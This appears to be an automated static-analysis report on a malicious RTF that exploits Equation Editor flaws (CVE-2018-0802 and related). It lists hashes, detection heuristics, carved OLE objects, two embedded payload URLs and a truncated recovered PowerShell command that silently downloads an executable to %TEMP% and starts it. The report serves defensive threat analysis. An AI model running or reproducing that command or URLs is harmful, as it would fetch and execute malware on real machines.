Malicious RTF — malware analysis report

Static analysis result for SHA-256 bf15ec1fbc60b552…

MALICIOUS

RTF

41.2 KB First seen: 2018-08-05
MD5: f9f9f5e74c4d24a5517a05bd5c2025eb SHA-1: a4df6cf049a5af557c9d87c3185d221278754f31 SHA-256: bf15ec1fbc60b5525913b15cd4693949c7e0f82254ccc4b9944d17931e5561c7
262 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The sample is an RTF document containing OLE object data and triggering heuristics related to Equation Editor exploits, specifically CVE-2018-0802. It also contains embedded URLs that likely serve as download locations for a second-stage payload. The presence of shellcode-related signals in static triage further supports the exploitation of a vulnerability for client execution.

Heuristics 7

  • Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
  • ClamAV: Rtf.Exploit.CVE_2018_0802-6825822-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2018_0802-6825822-0
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data medium RTF_OBJDATA
    RTF contains 5 \objdata section(s) — embedded OLE objects
  • OlePres presentation stream in RTF OLE object medium RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://rsaustria.com/soperos.bin In RTF body
    • http://galeona.com/soperos.binIn RTF body

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off000027bc.bin rtf-objdata-decoded RTF \objdata at offset 0x27BC 377 bytes
SHA-256: 9f9df4f20bf46ffe79f02ef9500bcd656d2853d076bd9955c086799dc82c74b0
objdata_01_off0000467d.bin rtf-objdata-decoded RTF \objdata at offset 0x467D 221 bytes
SHA-256: ad609ffc162a8f2c51146179a90ce98f4af7f47c54c9abe165f6c6d053ed0b92
objdata_02_off00004899.bin rtf-objdata-decoded RTF \objdata at offset 0x4899 490 bytes
SHA-256: 2defbf0a4b8af531cb5a88140d48dfcceeda8f4965ea258162ac5b7fcb12c1a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered URL(s): http://rsaustria.com/soperos.bin Static shellcode analysis recovered command string(s): PowerShell -W Hidden ""function platolinux([String] $fausnake){(New-Object System.Net.WebClient).DownloadFile($fausnake,'%TEMP%\clugainn.exe');Start-Process '%TEMP%\cluga
objdata_03_off00005499.bin rtf-objdata-decoded RTF \objdata at offset 0x5499 4681 bytes
SHA-256: 2739ee55bfe1b2a7508c33fd0cfd32fd82a891d81959369110cce62e729ae09e